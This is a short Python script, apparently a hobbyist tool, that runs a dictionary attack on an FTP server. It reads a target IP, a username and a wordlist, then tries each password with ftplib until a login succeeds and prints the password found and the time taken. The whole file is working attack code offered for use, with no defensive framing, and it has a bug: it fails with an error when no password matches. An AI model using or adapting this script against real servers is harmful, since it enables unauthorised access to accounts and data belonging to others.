#! /usr/bin/python3
from colorama import Fore
import ftplib
import time
import datetime
server =input(Fore.RED+'give server ip\n=>')
user=input(Fore.CYAN+'give username\n=>')
passwordlist=input(Fore.LIGHTYELLOW_EX+'enter the path of the wordlist\n=>')
time_started=time.time()
try:
    with open(passwordlist,'r')as pw:
        for word in pw:
            word=word.strip('\r').strip('\n')
            try:
                ftp=ftplib.FTP(server)
                ftp.login(user,word)
                print('success the password is ' + word)
                a=True
                break
            except:
                print(Fore.GREEN+'still trying')
except:
   print('wordlist error')
if a==True:
    time_lasted=datetime.timedelta(seconds=time.time()-time_started)
    print('total time to find the password:',time_lasted)
